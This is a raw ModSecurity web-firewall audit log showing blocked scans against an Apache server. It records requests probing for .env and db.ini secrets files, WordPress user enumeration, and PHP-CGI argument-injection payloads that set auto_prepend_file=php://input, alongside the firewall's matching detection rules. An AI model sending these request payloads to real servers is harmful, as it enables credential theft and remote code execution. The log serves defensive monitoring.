Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744675995569601 905 (- - -)
Stopwatch2: 1744675995569601 905; combined=351, p1=308, p2=0, p3=0, p4=0, p5=43, sr=83, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--71d5fe23-Z--
--d0327055-A--
[15/Apr/2025:08:51:36 +0700] Z_27qCULYKh39tLgM0CFzQAAAEE 103.236.140.4 41558 103.236.140.4 8181
--d0327055-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--d0327055-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d0327055-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681896420024 844 (- - -)
Stopwatch2: 1744681896420024 844; combined=337, p1=299, p2=0, p3=0, p4=0, p5=38, sr=101, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d0327055-Z--
--b2cb8d29-A--
[15/Apr/2025:08:51:36 +0700] Z_27qCULYKh39tLgM0CFzgAAAEI 103.236.140.4 41560 103.236.140.4 8181
--b2cb8d29-B--
GET /config/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--b2cb8d29-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b2cb8d29-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681896601907 738 (- - -)
Stopwatch2: 1744681896601907 738; combined=290, p1=254, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b2cb8d29-Z--
--c3eb047f-A--
[15/Apr/2025:08:51:36 +0700] Z_27qKXLWI2MDahumW9vjwAAAMI 103.236.140.4 41562 103.236.140.4 8181
--c3eb047f-B--
GET /.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--c3eb047f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c3eb047f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681896769833 672 (- - -)
Stopwatch2: 1744681896769833 672; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c3eb047f-Z--
--89f54c63-A--
[15/Apr/2025:08:51:36 +0700] Z_27qM1f8LoF-Pq3UL777gAAAIo 103.236.140.4 41564 103.236.140.4 8181
--89f54c63-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--89f54c63-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--89f54c63-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681896771645 654 (- - -)
Stopwatch2: 1744681896771645 654; combined=253, p1=220, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--89f54c63-Z--
--915c793a-A--
[15/Apr/2025:08:51:36 +0700] Z_27qKXLWI2MDahumW9vkAAAAMA 103.236.140.4 41566 103.236.140.4 8181
--915c793a-B--
GET /api/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--915c793a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--915c793a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681896937504 621 (- - -)
Stopwatch2: 1744681896937504 621; combined=253, p1=222, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--915c793a-Z--
--9e30d912-A--
[15/Apr/2025:08:51:36 +0700] Z_27qKXLWI2MDahumW9vkQAAAME 103.236.140.4 41568 103.236.140.4 8181
--9e30d912-B--
GET /config/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--9e30d912-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9e30d912-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681896940680 605 (- - -)
Stopwatch2: 1744681896940680 605; combined=244, p1=213, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9e30d912-Z--
--573ad162-A--
[15/Apr/2025:08:51:37 +0700] Z_27qSULYKh39tLgM0CFzwAAAEQ 103.236.140.4 41570 103.236.140.4 8181
--573ad162-B--
GET /settings/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--573ad162-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--573ad162-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681897105181 639 (- - -)
Stopwatch2: 1744681897105181 639; combined=261, p1=230, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--573ad162-Z--
--8ed68556-A--
[15/Apr/2025:08:51:37 +0700] Z_27qSULYKh39tLgM0CF0AAAAEU 103.236.140.4 41572 103.236.140.4 8181
--8ed68556-B--
GET /.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--8ed68556-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8ed68556-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681897121626 617 (- - -)
Stopwatch2: 1744681897121626 617; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8ed68556-Z--
--9e509229-A--
[15/Apr/2025:08:51:37 +0700] Z_27qSULYKh39tLgM0CF0gAAAEo 103.236.140.4 41576 103.236.140.4 8181
--9e509229-B--
GET /api/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--9e509229-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9e509229-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681897290569 642 (- - -)
Stopwatch2: 1744681897290569 642; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9e509229-Z--
--ecd74957-A--
[15/Apr/2025:08:51:37 +0700] Z_27qaXLWI2MDahumW9vkwAAAMU 103.236.140.4 41580 103.236.140.4 8181
--ecd74957-B--
GET /settings/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--ecd74957-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ecd74957-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744681897459824 761 (- - -)
Stopwatch2: 1744681897459824 761; combined=326, p1=292, p2=0, p3=0, p4=0, p5=34, sr=113, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ecd74957-Z--
--6242ae32-A--
[15/Apr/2025:08:51:38 +0700] Z_27qqXLWI2MDahumW9vmwAAANM 103.236.140.4 41596 103.236.140.4 8181
--6242ae32-B--
GET /db.ini HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.208
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--6242ae32-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6242ae32-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744681898548441 1679 (- - -)
Stopwatch2: 1744681898548441 1679; combined=619, p1=301, p2=292, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6242ae32-Z--
--2a86644c-A--
[15/Apr/2025:15:28:42 +0700] Z_4YuqXLWI2MDahumW964gAAAM8 103.236.140.4 35904 103.236.140.4 8181
--2a86644c-B--
GET /wp-json/wp/v2/users HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 174.138.30.61
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 174.138.30.61
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: */*
--2a86644c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2a86644c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744705722542946 3130 (- - -)
Stopwatch2: 1744705722542946 3130; combined=1398, p1=444, p2=926, p3=0, p4=0, p5=28, sr=102, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2a86644c-Z--
--4a9d172a-A--
[15/Apr/2025:16:33:52 +0700] Z_4oAM1f8LoF-Pq3UL4Q1AAAAIo 103.236.140.4 36318 103.236.140.4 8181
--4a9d172a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.16
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.16
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--4a9d172a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4a9d172a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744709632189923 909 (- - -)
Stopwatch2: 1744709632189923 909; combined=391, p1=343, p2=0, p3=0, p4=0, p5=48, sr=87, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4a9d172a-Z--
--5768df07-A--
[15/Apr/2025:16:33:54 +0700] Z_4oAs1f8LoF-Pq3UL4Q1gAAAIs 103.236.140.4 36322 103.236.140.4 8181
--5768df07-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.16
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.16
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--5768df07-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5768df07-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744709634275383 671 (- - -)
Stopwatch2: 1744709634275383 671; combined=270, p1=236, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5768df07-Z--
--c37e406e-A--
[15/Apr/2025:16:46:04 +0700] Z_4q3M1f8LoF-Pq3UL4Q3gAAAIU 103.236.140.4 36394 103.236.140.4 8181
--c37e406e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 143.198.4.146
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 143.198.4.146
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--c37e406e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c37e406e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744710364602221 868 (- - -)
Stopwatch2: 1744710364602221 868; combined=354, p1=314, p2=0, p3=0, p4=0, p5=40, sr=84, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c37e406e-Z--
--3a15707f-A--
[15/Apr/2025:17:33:27 +0700] Z_4198-f7AifS1fst96B1wAAAAM 103.236.140.4 40492 103.236.140.4 8181
--3a15707f-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 130.61.224.219
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 130.61.224.219
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--3a15707f-C--
--3a15707f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3a15707f-E--
--3a15707f-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744713207052228 4763 (- - -)
Stopwatch2: 1744713207052228 4763; combined=3146, p1=470, p2=2645, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3a15707f-Z--
--3ada0e01-A--
[15/Apr/2025:18:31:40 +0700] Z_5DnCULYKh39tLgM0CSfQAAAFI 103.236.140.4 40850 103.236.140.4 8181
--3ada0e01-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.101
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.101
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept-Charset: utf-8
--3ada0e01-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3ada0e01-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744716700658483 791 (- - -)
Stopwatch2: 1744716700658483 791; combined=329, p1=287, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3ada0e01-Z--
--97d65c4a-A--
[15/Apr/2025:18:32:10 +0700] Z_5Dus1f8LoF-Pq3UL4TqwAAAIQ 103.236.140.4 40852 103.236.140.4 8181
--97d65c4a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.101
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.101
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36
Accept-Charset: utf-8
--97d65c4a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--97d65c4a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744716730525632 723 (- - -)
Stopwatch2: 1744716730525632 723; combined=306, p1=267, p2=0, p3=0, p4=0, p5=39, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--97d65c4a-Z--
--6a09470f-A--
[15/Apr/2025:20:02:03 +0700] Z_5Yy6XLWI2MDahumW9-qQAAANI 103.236.140.4 42102 103.236.140.4 8181
--6a09470f-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--6a09470f-C--
--6a09470f-F--
